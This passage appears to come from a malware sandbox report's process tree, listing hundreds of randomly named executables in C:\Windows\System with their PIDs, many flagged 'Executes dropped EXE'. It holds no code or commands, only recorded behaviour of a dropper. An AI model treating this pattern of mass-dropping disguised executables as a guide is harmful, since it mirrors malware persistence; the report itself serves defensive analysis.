  - Executes dropped EXE
  PID:3040
- C:\Windows\System\YxzerFQ.exe
  C:\Windows\System\YxzerFQ.exe
  2⤵
  - Executes dropped EXE
  PID:692
- C:\Windows\System\ifKuPdw.exe
  C:\Windows\System\ifKuPdw.exe
  2⤵
  - Executes dropped EXE
  PID:3484
- C:\Windows\System\GyBXgQg.exe
  C:\Windows\System\GyBXgQg.exe
  2⤵
  - Executes dropped EXE
  PID:5036
- C:\Windows\System\ACNfQuv.exe
  C:\Windows\System\ACNfQuv.exe
  2⤵
  - Executes dropped EXE
  PID:4216
- C:\Windows\System\QUVqDgT.exe
  C:\Windows\System\QUVqDgT.exe
  2⤵
  - Executes dropped EXE
  PID:2640
- C:\Windows\System\AQBKalY.exe
  C:\Windows\System\AQBKalY.exe
  2⤵
  - Executes dropped EXE
  PID:1708
- C:\Windows\System\ouhNlnn.exe
  C:\Windows\System\ouhNlnn.exe
  2⤵
  - Executes dropped EXE
  PID:804
- C:\Windows\System\EBnSqgg.exe
  C:\Windows\System\EBnSqgg.exe
  2⤵
  - Executes dropped EXE
  PID:1428
- C:\Windows\System\vilIBsD.exe
  C:\Windows\System\vilIBsD.exe
  2⤵
  - Executes dropped EXE
  PID:4428
- C:\Windows\System\KrFMNya.exe
  C:\Windows\System\KrFMNya.exe
  2⤵
  - Executes dropped EXE
  PID:3160
- C:\Windows\System\YXIFnrt.exe
  C:\Windows\System\YXIFnrt.exe
  2⤵
  - Executes dropped EXE
  PID:2360
- C:\Windows\System\ASfEPdn.exe
  C:\Windows\System\ASfEPdn.exe
  2⤵
  - Executes dropped EXE
  PID:3868
- C:\Windows\System\xgkdJqU.exe
  C:\Windows\System\xgkdJqU.exe
  2⤵
  - Executes dropped EXE
  PID:4352
- C:\Windows\System\LUjcCKK.exe
  C:\Windows\System\LUjcCKK.exe
  2⤵
  - Executes dropped EXE
  PID:2076
- C:\Windows\System\ZRUNiwP.exe
  C:\Windows\System\ZRUNiwP.exe
  2⤵
  - Executes dropped EXE
  PID:2840
- C:\Windows\System\mSEthHd.exe
  C:\Windows\System\mSEthHd.exe
  2⤵
  - Executes dropped EXE
  PID:3564
- C:\Windows\System\bXpHlJg.exe
  C:\Windows\System\bXpHlJg.exe
  2⤵
  - Executes dropped EXE
  PID:1972
- C:\Windows\System\Mbmzbdb.exe
  C:\Windows\System\Mbmzbdb.exe
  2⤵
  - Executes dropped EXE
  PID:3952
- C:\Windows\System\PnHNctc.exe
  C:\Windows\System\PnHNctc.exe
  2⤵
  - Executes dropped EXE
  PID:3096
- C:\Windows\System\UUkpKQi.exe
  C:\Windows\System\UUkpKQi.exe
  2⤵
  - Executes dropped EXE
  PID:3512
- C:\Windows\System\tgfbfbP.exe
  C:\Windows\System\tgfbfbP.exe
  2⤵
  - Executes dropped EXE
  PID:3944
- C:\Windows\System\UQOlHYE.exe
  C:\Windows\System\UQOlHYE.exe
  2⤵
  - Executes dropped EXE
  PID:4196
- C:\Windows\System\QyOXBIr.exe
  C:\Windows\System\QyOXBIr.exe
  2⤵
  - Executes dropped EXE
  PID:2676
- C:\Windows\System\JgQtMwm.exe
  C:\Windows\System\JgQtMwm.exe
  2⤵
  - Executes dropped EXE
  PID:1488
- C:\Windows\System\DPlsDKW.exe
  C:\Windows\System\DPlsDKW.exe
  2⤵
  - Executes dropped EXE
  PID:3924
- C:\Windows\System\XoXBGWe.exe
  C:\Windows\System\XoXBGWe.exe
  2⤵
  - Executes dropped EXE
  PID:4320
- C:\Windows\System\bSMZwOg.exe
  C:\Windows\System\bSMZwOg.exe
  2⤵
  - Executes dropped EXE
  PID:3108
- C:\Windows\System\jVPHHcm.exe
  C:\Windows\System\jVPHHcm.exe
  2⤵
  - Executes dropped EXE
  PID:1644
- C:\Windows\System\kPysnfD.exe
  C:\Windows\System\kPysnfD.exe
  2⤵
  - Executes dropped EXE
  PID:3572
- C:\Windows\System\hoOmUwZ.exe
  C:\Windows\System\hoOmUwZ.exe
  2⤵
  - Executes dropped EXE
  PID:3720
- C:\Windows\System\IyFKutQ.exe
  C:\Windows\System\IyFKutQ.exe
  2⤵
  - Executes dropped EXE
  PID:4724
- C:\Windows\System\rZBzmGB.exe
  C:\Windows\System\rZBzmGB.exe
  2⤵
  - Executes dropped EXE
  PID:452
- C:\Windows\System\tlfqyZk.exe
  C:\Windows\System\tlfqyZk.exe
  2⤵
  - Executes dropped EXE
  PID:4472
- C:\Windows\System\ZwTiDuI.exe
  C:\Windows\System\ZwTiDuI.exe
  2⤵
  - Executes dropped EXE
  PID:1568
- C:\Windows\System\GDxyZWP.exe
  C:\Windows\System\GDxyZWP.exe
  2⤵
  - Executes dropped EXE
  PID:5048
- C:\Windows\System\zHHpfmI.exe
  C:\Windows\System\zHHpfmI.exe
  2⤵
  - Executes dropped EXE
  PID:3964
- C:\Windows\System\CXQZQTF.exe
  C:\Windows\System\CXQZQTF.exe
  2⤵
  - Executes dropped EXE
  PID:4816
- C:\Windows\System\KNqCCwr.exe
  C:\Windows\System\KNqCCwr.exe
  2⤵
  - Executes dropped EXE
  PID:1184
- C:\Windows\System\nvnXxny.exe
  C:\Windows\System\nvnXxny.exe
  2⤵
  - Executes dropped EXE
  PID:4460
- C:\Windows\System\aCaXvsj.exe
  C:\Windows\System\aCaXvsj.exe
  2⤵
  - Executes dropped EXE
  PID:4440
- C:\Windows\System\OdGzfCy.exe
  C:\Windows\System\OdGzfCy.exe
  2⤵
  - Executes dropped EXE
  PID:2952
- C:\Windows\System\OOChalD.exe
  C:\Windows\System\OOChalD.exe
  2⤵
  - Executes dropped EXE
  PID:2664
- C:\Windows\System\sHabLwJ.exe
  C:\Windows\System\sHabLwJ.exe
  2⤵
  - Executes dropped EXE
  PID:4072
- C:\Windows\System\UVZJuza.exe
  C:\Windows\System\UVZJuza.exe
  2⤵
  - Executes dropped EXE
  PID:1852
- C:\Windows\System\qdFrhsX.exe
  C:\Windows\System\qdFrhsX.exe
  2⤵
  - Executes dropped EXE
  PID:880
- C:\Windows\System\NpBcLMx.exe
  C:\Windows\System\NpBcLMx.exe
  2⤵
  - Executes dropped EXE
  PID:4068
- C:\Windows\System\WtVpLga.exe
  C:\Windows\System\WtVpLga.exe
  2⤵
  - Executes dropped EXE
  PID:2320
- C:\Windows\System\WHKRxqv.exe
  C:\Windows\System\WHKRxqv.exe
  2⤵
  - Executes dropped EXE
  PID:4040
- C:\Windows\System\oBwbGVw.exe
  C:\Windows\System\oBwbGVw.exe
  2⤵
  - Executes dropped EXE
  PID:4132
- C:\Windows\System\XQBPvAx.exe
  C:\Windows\System\XQBPvAx.exe
  2⤵
  - Executes dropped EXE
  PID:2964
- C:\Windows\System\ZGcYXwZ.exe
  C:\Windows\System\ZGcYXwZ.exe
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Windows\System\KUGPOIp.exe
  C:\Windows\System\KUGPOIp.exe
  2⤵
  - Executes dropped EXE
  PID:588
- C:\Windows\System\vtCwzBz.exe
  C:\Windows\System\vtCwzBz.exe
  2⤵
  - Executes dropped EXE
  PID:3448
- C:\Windows\System\MqJhVSG.exe
  C:\Windows\System\MqJhVSG.exe
  2⤵
  - Executes dropped EXE
  PID:2276
- C:\Windows\System\NfwgexG.exe
  C:\Windows\System\NfwgexG.exe
  2⤵
  - Executes dropped EXE
  PID:1268
- C:\Windows\System\QhDVprb.exe
  C:\Windows\System\QhDVprb.exe
  2⤵
  - Executes dropped EXE
  PID:2948
- C:\Windows\System\AvqbNkK.exe
  C:\Windows\System\AvqbNkK.exe
  2⤵
  - Executes dropped EXE
  PID:3780
- C:\Windows\System\RTfVBWf.exe
  C:\Windows\System\RTfVBWf.exe
  2⤵
  - Executes dropped EXE
  PID:2288
- C:\Windows\System\xnhKhxb.exe
  C:\Windows\System\xnhKhxb.exe
  2⤵
  - Executes dropped EXE
  PID:3076
- C:\Windows\System\LFqehpa.exe
  C:\Windows\System\LFqehpa.exe
  2⤵
  - Executes dropped EXE
  PID:1056
- C:\Windows\System\hKwClub.exe
  C:\Windows\System\hKwClub.exe
  2⤵
  - Executes dropped EXE
  PID:2224
- C:\Windows\System\kLKyaXX.exe
  C:\Windows\System\kLKyaXX.exe
  2⤵
  - Executes dropped EXE
  PID:396
- C:\Windows\System\RKUmauR.exe
  C:\Windows\System\RKUmauR.exe
  2⤵
  PID:540
- C:\Windows\System\SXyYtxb.exe
  C:\Windows\System\SXyYtxb.exe
  2⤵
  PID:4064
- C:\Windows\System\RIbRpNP.exe
  C:\Windows\System\RIbRpNP.exe
  2⤵
  PID:3712
- C:\Windows\System\CAiJBRB.exe
  C:\Windows\System\CAiJBRB.exe
  2⤵
  PID:3276
- C:\Windows\System\exLbaLb.exe
  C:\Windows\System\exLbaLb.exe
  2⤵
  PID:4528
- C:\Windows\System\JUrPbMh.exe
  C:\Windows\System\JUrPbMh.exe
  2⤵
  PID:1324
- C:\Windows\System\KUPbhYP.exe
  C:\Windows\System\KUPbhYP.exe
  2⤵
  PID:2132
- C:\Windows\System\gnRIhJK.exe
  C:\Windows\System\gnRIhJK.exe
  2⤵
  PID:760
- C:\Windows\System\fggpgzJ.exe
  C:\Windows\System\fggpgzJ.exe
  2⤵
  PID:4944
- C:\Windows\System\rCuUlsH.exe
  C:\Windows\System\rCuUlsH.exe
  2⤵
  PID:2108
- C:\Windows\System\rpthxKS.exe
  C:\Windows\System\rpthxKS.exe
  2⤵
  PID:4456
- C:\Windows\System\hnDYtSy.exe
  C:\Windows\System\hnDYtSy.exe
  2⤵
  PID:5128
- C:\Windows\System\BhFpDTc.exe
  C:\Windows\System\BhFpDTc.exe
  2⤵
  PID:5152
- C:\Windows\System\EnfucwR.exe
  C:\Windows\System\EnfucwR.exe
  2⤵
  PID:5180
- C:\Windows\System\JiqLZCz.exe
  C:\Windows\System\JiqLZCz.exe
  2⤵
  PID:5208
- C:\Windows\System\dexZBPI.exe
  C:\Windows\System\dexZBPI.exe
  2⤵
  PID:5240
- C:\Windows\System\kJrWMVy.exe
  C:\Windows\System\kJrWMVy.exe
  2⤵
  PID:5264
- C:\Windows\System\NoTMXHC.exe
  C:\Windows\System\NoTMXHC.exe
  2⤵
  PID:5292
- C:\Windows\System\xsElSGw.exe
  C:\Windows\System\xsElSGw.exe
  2⤵
  PID:5320
- C:\Windows\System\DNOdGLK.exe
  C:\Windows\System\DNOdGLK.exe
  2⤵
  PID:5348
- C:\Windows\System\lZGRTvx.exe
  C:\Windows\System\lZGRTvx.exe
  2⤵
  PID:5484
- C:\Windows\System\mhoqndt.exe
  C:\Windows\System\mhoqndt.exe
  2⤵
  PID:5528
- C:\Windows\System\JIslFnB.exe
  C:\Windows\System\JIslFnB.exe
  2⤵
  PID:5548
- C:\Windows\System\TcXErki.exe
  C:\Windows\System\TcXErki.exe
  2⤵
  PID:5572
- C:\Windows\System\EwOsLII.exe
  C:\Windows\System\EwOsLII.exe
  2⤵
  PID:5612
- C:\Windows\System\XJZJmZe.exe
  C:\Windows\System\XJZJmZe.exe
  2⤵
  PID:5672
- C:\Windows\System\ffrGJde.exe
  C:\Windows\System\ffrGJde.exe
  2⤵
  PID:5704
- C:\Windows\System\sQJGHaM.exe
  C:\Windows\System\sQJGHaM.exe
  2⤵
  PID:5724
- C:\Windows\System\PIrQpaL.exe
  C:\Windows\System\PIrQpaL.exe
  2⤵
  PID:5752
- C:\Windows\System\ceyXfwW.exe
  C:\Windows\System\ceyXfwW.exe
  2⤵
  PID:5772
- C:\Windows\System\hIbyVcH.exe
  C:\Windows\System\hIbyVcH.exe
  2⤵
  PID:5804
- C:\Windows\System\wIwunkB.exe
  C:\Windows\System\wIwunkB.exe
  2⤵
  PID:5832
- C:\Windows\System\pItdVXW.exe
  C:\Windows\System\pItdVXW.exe
  2⤵
  PID:5852
- C:\Windows\System\DwDJIQw.exe
  C:\Windows\System\DwDJIQw.exe
  2⤵
  PID:5868
- C:\Windows\System\alXhtLU.exe
  C:\Windows\System\alXhtLU.exe
  2⤵
  PID:5920
- C:\Windows\System\viaYpfd.exe
  C:\Windows\System\viaYpfd.exe
  2⤵
  PID:5944
- C:\Windows\System\zGVXSOl.exe
  C:\Windows\System\zGVXSOl.exe
  2⤵
  PID:5964
- C:\Windows\System\bqMUdFP.exe
  C:\Windows\System\bqMUdFP.exe
  2⤵
  PID:6000
- C:\Windows\System\xBvrQSP.exe
  C:\Windows\System\xBvrQSP.exe
  2⤵
  PID:6020
- C:\Windows\System\mmqoyXS.exe
  C:\Windows\System\mmqoyXS.exe
  2⤵
  PID:6048
- C:\Windows\System\zTEXxie.exe
  C:\Windows\System\zTEXxie.exe
  2⤵
  PID:6076
- C:\Windows\System\KBXGABK.exe
  C:\Windows\System\KBXGABK.exe
  2⤵
  PID:6104
- C:\Windows\System\IHrRCsQ.exe
  C:\Windows\System\IHrRCsQ.exe
  2⤵
  PID:6140
- C:\Windows\System\yQBRhwx.exe
  C:\Windows\System\yQBRhwx.exe
  2⤵
  PID:4192
- C:\Windows\System\AfkqPix.exe
  C:\Windows\System\AfkqPix.exe
  2⤵
  PID:2420
- C:\Windows\System\JIaclJi.exe
  C:\Windows\System\JIaclJi.exe
  2⤵
  PID:2440
- C:\Windows\System\BDfsMSV.exe
  C:\Windows\System\BDfsMSV.exe
  2⤵
  PID:4896
- C:\Windows\System\zupipVu.exe
  C:\Windows\System\zupipVu.exe
  2⤵
  PID:5144
- C:\Windows\System\wdkkdGl.exe
  C:\Windows\System\wdkkdGl.exe
  2⤵
  PID:5224
- C:\Windows\System\klmMncN.exe
  C:\Windows\System\klmMncN.exe
  2⤵
  PID:5308
- C:\Windows\System\dnLthVV.exe
  C:\Windows\System\dnLthVV.exe
  2⤵
  PID:2972
- C:\Windows\System\cvozFWd.exe
  C:\Windows\System\cvozFWd.exe
  2⤵
  PID:2980
- C:\Windows\System\EcciEiS.exe
  C:\Windows\System\EcciEiS.exe
  2⤵
  PID:2512
- C:\Windows\System\zWJrrnk.exe
  C:\Windows\System\zWJrrnk.exe
  2⤵
  PID:1952
- C:\Windows\System\jfVfehM.exe
  C:\Windows\System\jfVfehM.exe
  2⤵
  PID:2764
- C:\Windows\System\PbCviBN.exe
  C:\Windows\System\PbCviBN.exe
  2⤵
  PID:1040
- C:\Windows\System\yXwaJYg.exe
  C:\Windows\System\yXwaJYg.exe
  2⤵
  PID:4376
- C:\Windows\System\wSGLpZC.exe
  C:\Windows\System\wSGLpZC.exe
  2⤵
  PID:4684
- C:\Windows\System\dahiuTZ.exe
  C:\Windows\System\dahiuTZ.exe
  2⤵
  PID:5516
- C:\Windows\System\DsFnbej.exe
  C:\Windows\System\DsFnbej.exe
  2⤵
  PID:5584
- C:\Windows\System\tCjpPML.exe
  C:\Windows\System\tCjpPML.exe
  2⤵
  PID:5568
- C:\Windows\System\Apembgk.exe
  C:\Windows\System\Apembgk.exe
  2⤵
  PID:5688
- C:\Windows\System\kgcebQT.exe
  C:\Windows\System\kgcebQT.exe
  2⤵
  PID:5764
- C:\Windows\System\JnOUILG.exe
  C:\Windows\System\JnOUILG.exe
  2⤵
  PID:5828
- C:\Windows\System\RwPEJOv.exe
  C:\Windows\System\RwPEJOv.exe
  2⤵
  PID:5912
- C:\Windows\System\xHMyHND.exe
  C:\Windows\System\xHMyHND.exe
  2⤵
  PID:5984
- C:\Windows\System\pazghlD.exe
  C:\Windows\System\pazghlD.exe
  2⤵
  PID:6064
- C:\Windows\System\QarGirZ.exe
  C:\Windows\System\QarGirZ.exe
  2⤵
  PID:6056
- C:\Windows\System\xDKOCOp.exe
  C:\Windows\System\xDKOCOp.exe
  2⤵
  PID:4420
- C:\Windows\System\Uqbxhcc.exe
  C:\Windows\System\Uqbxhcc.exe
  2⤵
  PID:5140
- C:\Windows\System\FsHZLfL.exe
  C:\Windows\System\FsHZLfL.exe
  2⤵
  PID:5196
- C:\Windows\System\AWJZNOv.exe
  C:\Windows\System\AWJZNOv.exe
  2⤵
  PID:2096
- C:\Windows\System\rieKRxf.exe
  C:\Windows\System\rieKRxf.exe
  2⤵
  PID:5372
- C:\Windows\System\dJJpJRQ.exe
  C:\Windows\System\dJJpJRQ.exe
  2⤵
  PID:3228
- C:\Windows\System\WHkMmAo.exe
  C:\Windows\System\WHkMmAo.exe
  2⤵
  PID:3552
- C:\Windows\System\eWUhNkC.exe
  C:\Windows\System\eWUhNkC.exe
  2⤵
  PID:668
- C:\Windows\System\KCOfTIl.exe
  C:\Windows\System\KCOfTIl.exe
  2⤵
  PID:1936
- C:\Windows\System\yJIKEib.exe
  C:\Windows\System\yJIKEib.exe
  2⤵
  PID:5644
- C:\Windows\System\eEoyHiO.exe
  C:\Windows\System\eEoyHiO.exe
  2⤵
  PID:5660
- C:\Windows\System\FGfwhgb.exe
  C:\Windows\System\FGfwhgb.exe
  2⤵
  PID:5840
- C:\Windows\System\JSQQZwF.exe
  C:\Windows\System\JSQQZwF.exe
  2⤵
  PID:5812
- C:\Windows\System\vUbvarJ.exe
  C:\Windows\System\vUbvarJ.exe
  2⤵
  PID:6060
- C:\Windows\System\GLbHdga.exe
  C:\Windows\System\GLbHdga.exe
  2⤵
  PID:3620
- C:\Windows\System\KsdoMzt.exe
  C:\Windows\System\KsdoMzt.exe
  2⤵
  PID:2180
- C:\Windows\System\RuQbOmB.exe
  C:\Windows\System\RuQbOmB.exe
  2⤵
  PID:3224
- C:\Windows\System\YrKpoJp.exe
  C:\Windows\System\YrKpoJp.exe
  2⤵
  PID:5864
- C:\Windows\System\pcMdKTT.exe
  C:\Windows\System\pcMdKTT.exe
  2⤵
  PID:2708
- C:\Windows\System\ZOEaNNm.exe
  C:\Windows\System\ZOEaNNm.exe
  2⤵
  PID:5420
- C:\Windows\System\WbrOZKA.exe
  C:\Windows\System\WbrOZKA.exe
  2⤵
  PID:5440
- C:\Windows\System\dUWkEDE.exe
  C:\Windows\System\dUWkEDE.exe
  2⤵
  PID:5256
- C:\Windows\System\WdMMNxQ.exe
  C:\Windows\System\WdMMNxQ.exe
  2⤵
  PID:6168
- C:\Windows\System\uwYhyFy.exe
  C:\Windows\System\uwYhyFy.exe
  2⤵
  PID:6192
- C:\Windows\System\ilVkvTQ.exe
  C:\Windows\System\ilVkvTQ.exe
  2⤵
  PID:6216
- C:\Windows\System\TMTsPqK.exe
  C:\Windows\System\TMTsPqK.exe
  2⤵
  PID:6252
- C:\Windows\System\qlHiWfP.exe
  C:\Windows\System\qlHiWfP.exe
  2⤵
  PID:6280
- C:\Windows\System\SXaObkL.exe
  C:\Windows\System\SXaObkL.exe
  2⤵
  PID:6316
- C:\Windows\System\UOveGsw.exe
  C:\Windows\System\UOveGsw.exe
  2⤵
  PID:6340
- C:\Windows\System\CNGOqCR.exe
  C:\Windows\System\CNGOqCR.exe
  2⤵
  PID:6360
- C:\Windows\System\qAHIVtp.exe
  C:\Windows\System\qAHIVtp.exe
  2⤵
  PID:6384
- C:\Windows\System\rwTrdOd.exe
  C:\Windows\System\rwTrdOd.exe
  2⤵
  PID:6404
- C:\Windows\System\ofuPASy.exe
  C:\Windows\System\ofuPASy.exe
  2⤵
  PID:6448
- C:\Windows\System\EJnFuOu.exe
  C:\Windows\System\EJnFuOu.exe
  2⤵
  PID:6472
- C:\Windows\System\Nswaicq.exe
  C:\Windows\System\Nswaicq.exe
  2⤵
  PID:6496
- C:\Windows\System\tOmgriA.exe
  C:\Windows\System\tOmgriA.exe
  2⤵
  PID:6520
- C:\Windows\System\vADxsTW.exe
  C:\Windows\System\vADxsTW.exe
  2⤵
  PID:6560
- C:\Windows\System\OXEpfWS.exe
  C:\Windows\System\OXEpfWS.exe
  2⤵
  PID:6576
- C:\Windows\System\wYNiOCt.exe
  C:\Windows\System\wYNiOCt.exe
  2⤵
  PID:6600
- C:\Windows\System\bmOHWej.exe
  C:\Windows\System\bmOHWej.exe
  2⤵
  PID:6620
- C:\Windows\System\IhJgcSI.exe
  C:\Windows\System\IhJgcSI.exe
  2⤵
  PID:6660
- C:\Windows\System\zoNQOWG.exe
  C:\Windows\System\zoNQOWG.exe
  2⤵
  PID:6684
- C:\Windows\System\BmTCuSw.exe
  C:\Windows\System\BmTCuSw.exe
  2⤵
  PID:6716
- C:\Windows\System\VWBknHU.exe
  C:\Windows\System\VWBknHU.exe
  2⤵
  PID:6736
- C:\Windows\System\vrYxBLE.exe
  C:\Windows\System\vrYxBLE.exe
  2⤵
  PID:6760
- C:\Windows\System\izmrnGq.exe
  C:\Windows\System\izmrnGq.exe
  2⤵
  PID:6812
- C:\Windows\System\ubqHsdk.exe
  C:\Windows\System\ubqHsdk.exe
  2⤵
  PID:6828
- C:\Windows\System\aitWKoo.exe
  C:\Windows\System\aitWKoo.exe
  2⤵
  PID:6852
- C:\Windows\System\yUVKCiZ.exe
  C:\Windows\System\yUVKCiZ.exe
  2⤵
  PID:6872
- C:\Windows\System\wIzwokU.exe
  C:\Windows\System\wIzwokU.exe
  2⤵
  PID:6892
- C:\Windows\System\QpxotQU.exe
  C:\Windows\System\QpxotQU.exe
  2⤵
  PID:6916
- C:\Windows\System\VfvNcpy.exe
  C:\Windows\System\VfvNcpy.exe
  2⤵
  PID:6936
- C:\Windows\System\coCJkGL.exe
  C:\Windows\System\coCJkGL.exe
  2⤵
  PID:6964
- C:\Windows\System\UxJXmLn.exe
  C:\Windows\System\UxJXmLn.exe
  2⤵
  PID:7008
- C:\Windows\System\FExWVTy.exe
  C:\Windows\System\FExWVTy.exe
  2⤵
  PID:7048
- C:\Windows\System\pKGHccr.exe
  C:\Windows\System\pKGHccr.exe
  2⤵
  PID:7068
- C:\Windows\System\zQpdhEV.exe
  C:\Windows\System\zQpdhEV.exe
  2⤵
  PID:7092
- C:\Windows\System\HRlkoOq.exe
  C:\Windows\System\HRlkoOq.exe
  2⤵
  PID:7108
- C:\Windows\System\sJndcgD.exe
  C:\Windows\System\sJndcgD.exe
  2⤵
  PID:7132
- C:\Windows\System\AlmGbUn.exe
  C:\Windows\System\AlmGbUn.exe
  2⤵
  PID:5460
- C:\Windows\System\yqsYCsp.exe
  C:\Windows\System\yqsYCsp.exe
  2⤵
  PID:6164
- C:\Windows\System\UWLbiOl.exe
  C:\Windows\System\UWLbiOl.exe
  2⤵
  PID:6208
- C:\Windows\System\pinHSFe.exe
  C:\Windows\System\pinHSFe.exe
  2⤵
  PID:6248
- C:\Windows\System\qAPQuMl.exe
  C:\Windows\System\qAPQuMl.exe
  2⤵
  PID:6332
- C:\Windows\System\zEssivQ.exe
  C:\Windows\System\zEssivQ.exe
  2⤵
  PID:6420
- C:\Windows\System\nttFWXT.exe
  C:\Windows\System\nttFWXT.exe
  2⤵
  PID:6484
- C:\Windows\System\SlJNfgY.exe
  C:\Windows\System\SlJNfgY.exe
  2⤵
  PID:6608
- C:\Windows\System\vPVqDIC.exe
  C:\Windows\System\vPVqDIC.exe
  2⤵
  PID:6616
- C:\Windows\System\YNqAGSW.exe
  C:\Windows\System\YNqAGSW.exe
  2⤵
  PID:6680
- C:\Windows\System\WKsiGGs.exe
  C:\Windows\System\WKsiGGs.exe
  2⤵
  PID:6820
- C:\Windows\System\YbgopXD.exe
  C:\Windows\System\YbgopXD.exe
  2⤵
  PID:6868
- C:\Windows\System\jnCQwNb.exe
  C:\Windows\System\jnCQwNb.exe
  2⤵
  PID:6840
- C:\Windows\System\dasRJKh.exe
  C:\Windows\System\dasRJKh.exe
  2⤵
  PID:6932
- C:\Windows\System\MHkTjyZ.exe
  C:\Windows\System\MHkTjyZ.exe
  2⤵
  PID:6972
- C:\Windows\System\hMXHJTQ.exe
  C:\Windows\System\hMXHJTQ.exe
  2⤵
  PID:7040
- C:\Windows\System\oVREbWd.exe
  C:\Windows\System\oVREbWd.exe
  2⤵
  PID:7076
- C:\Windows\System\GkcIZKl.exe
  C:\Windows\System\GkcIZKl.exe
  2⤵
  PID:7128
- C:\Windows\System\YCKFCrj.exe
  C:\Windows\System\YCKFCrj.exe
  2⤵
  PID:7144
- C:\Windows\System\etudJvm.exe
  C:\Windows\System\etudJvm.exe
  2⤵
  PID:6392
- C:\Windows\System\jkdhFBh.exe
  C:\Windows\System\jkdhFBh.exe
  2⤵
  PID:6728
- C:\Windows\System\ddTuPCD.exe
  C:\Windows\System\ddTuPCD.exe
  2⤵
  PID:6888
- C:\Windows\System\EFfUjXF.exe
  C:\Windows\System\EFfUjXF.exe
  2⤵
  PID:6980
- C:\Windows\System\PRNnCVC.exe
  C:\Windows\System\PRNnCVC.exe
  2⤵
  PID:7152
- C:\Windows\System\LuWHwfs.exe
  C:\Windows\System\LuWHwfs.exe
  2⤵
  PID:6312
- C:\Windows\System\cKuGZIQ.exe
  C:\Windows\System\cKuGZIQ.exe
  2⤵
  PID:7004
- C:\Windows\System\yiragOw.exe
  C:\Windows\System\yiragOw.exe
  2⤵
  PID:6952
- C:\Windows\System\PiWVuJU.exe
  C:\Windows\System\PiWVuJU.exe
  2⤵
  PID:6584
- C:\Windows\System\lsGFhnV.exe
  C:\Windows\System\lsGFhnV.exe
  2⤵
  PID:7192
- C:\Windows\System\EoTvNtv.exe
  C:\Windows\System\EoTvNtv.exe
  2⤵
  PID:7228
- C:\Windows\System\Ojvjmom.exe
  C:\Windows\System\Ojvjmom.exe
  2⤵
  PID:7268
- C:\Windows\System\xgwzjcj.exe
  C:\Windows\System\xgwzjcj.exe
  2⤵
  PID:7292
- C:\Windows\System\zVcRRZs.exe
  C:\Windows\System\zVcRRZs.exe
  2⤵
  PID:7312
- C:\Windows\System\YxbZHLC.exe
  C:\Windows\System\YxbZHLC.exe
  2⤵
  PID:7340
- C:\Windows\System\rVMAiVs.exe
  C:\Windows\System\rVMAiVs.exe
  2⤵
  PID:7360
- C:\Windows\System\NCPSKEt.exe
  C:\Windows\System\NCPSKEt.exe
  2⤵
  PID:7380
- C:\Windows\System\EjtMdRu.exe
  C:\Windows\System\EjtMdRu.exe
  2⤵
  PID:7404
- C:\Windows\System\vfCowKY.exe
  C:\Windows\System\vfCowKY.exe
  2⤵
  PID:7432
- C:\Windows\System\OgwcXKB.exe
  C:\Windows\System\OgwcXKB.exe
  2⤵
  PID:7464
- C:\Windows\System\aPbLUxR.exe
  C:\Windows\System\aPbLUxR.exe
  2⤵
  PID:7484
- C:\Windows\System\kZOdBGA.exe
  C:\Windows\System\kZOdBGA.exe
  2⤵
  PID:7504
- C:\Windows\System\hNQECDP.exe
  C:\Windows\System\hNQECDP.exe
  2⤵
  PID:7556
- C:\Windows\System\pchvnXx.exe
  C:\Windows\System\pchvnXx.exe
  2⤵
  PID:7584
- C:\Windows\System\AUboDOY.exe
  C:\Windows\System\AUboDOY.exe
  2⤵
  PID:7600
- C:\Windows\System\VpOLWKl.exe
  C:\Windows\System\VpOLWKl.exe
  2⤵
  PID:7628
- C:\Windows\System\MeGCeCw.exe
  C:\Windows\System\MeGCeCw.exe
  2⤵
  PID:7660
- C:\Windows\System\SFenbSm.exe
  C:\Windows\System\SFenbSm.exe
  2⤵
  PID:7700
- C:\Windows\System\eNSqTNH.exe
  C:\Windows\System\eNSqTNH.exe
  2⤵
  PID:7716
- C:\Windows\System\yoRBbNd.exe
  C:\Windows\System\yoRBbNd.exe
  2⤵
  PID:7744
- C:\Windows\System\XFXwpOD.exe
  C:\Windows\System\XFXwpOD.exe
  2⤵
  PID:7768
- C:\Windows\System\eOxhgZA.exe
  C:\Windows\System\eOxhgZA.exe
  2⤵
  PID:7812
- C:\Windows\System\ifVwMqR.exe
  C:\Windows\System\ifVwMqR.exe
  2⤵
  PID:7836
- C:\Windows\System\RysdTcs.exe
  C:\Windows\System\RysdTcs.exe
  2⤵
  PID:7852
- C:\Windows\System\XqiTypK.exe
  C:\Windows\System\XqiTypK.exe
  2⤵
  PID:7872
- C:\Windows\System\qjyTvoA.exe
  C:\Windows\System\qjyTvoA.exe
  2⤵
  PID:7892
- C:\Windows\System\XhsOHRB.exe
  C:\Windows\System\XhsOHRB.exe
  2⤵
  PID:7912
- C:\Windows\System\atIGrhd.exe
  C:\Windows\System\atIGrhd.exe
  2⤵
  PID:7956
- C:\Windows\System\PFLGqvh.exe
  C:\Windows\System\PFLGqvh.exe
  2⤵
  PID:8004
- C:\Windows\System\myEoxmO.exe
  C:\Windows\System\myEoxmO.exe
  2⤵
  PID:8024
- C:\Windows\System\tMRNEzh.exe
  C:\Windows\System\tMRNEzh.exe
  2⤵
  PID:8048
- C:\Windows\System\pdlcoJb.exe
  C:\Windows\System\pdlcoJb.exe
  2⤵
  PID:8068
- C:\Windows\System\NxsUcQt.exe
  C:\Windows\System\NxsUcQt.exe
  2⤵
  PID:8092
- C:\Windows\System\ciJgMrM.exe
  C:\Windows\System\ciJgMrM.exe
  2⤵
  PID:8120
- C:\Windows\System\RwshInj.exe
  C:\Windows\System\RwshInj.exe
  2⤵
  PID:8160
- C:\Windows\System\jeijjVO.exe
  C:\Windows\System\jeijjVO.exe
  2⤵
  PID:8188
- C:\Windows\System\FqfJztI.exe
  C:\Windows\System\FqfJztI.exe
  2⤵
  PID:6636
- C:\Windows\System\NYuQWvd.exe
  C:\Windows\System\NYuQWvd.exe
  2⤵
  PID:7204
- C:\Windows\System\XlztrXv.exe
  C:\Windows\System\XlztrXv.exe
  2⤵
  PID:7368
- C:\Windows\System\VghMaIC.exe
  C:\Windows\System\VghMaIC.exe
  2⤵
  PID:7424
- C:\Windows\System\knjWQMW.exe
  C:\Windows\System\knjWQMW.exe
  2⤵
  PID:7532
- C:\Windows\System\ElhuaYa.exe
  C:\Windows\System\ElhuaYa.exe
  2⤵
  PID:2920
- C:\Windows\System\sainHwU.exe
  C:\Windows\System\sainHwU.exe
  2⤵
  PID:7608
- C:\Windows\System\lnVSFuv.exe
  C:\Windows\System\lnVSFuv.exe
  2⤵
  PID:7620
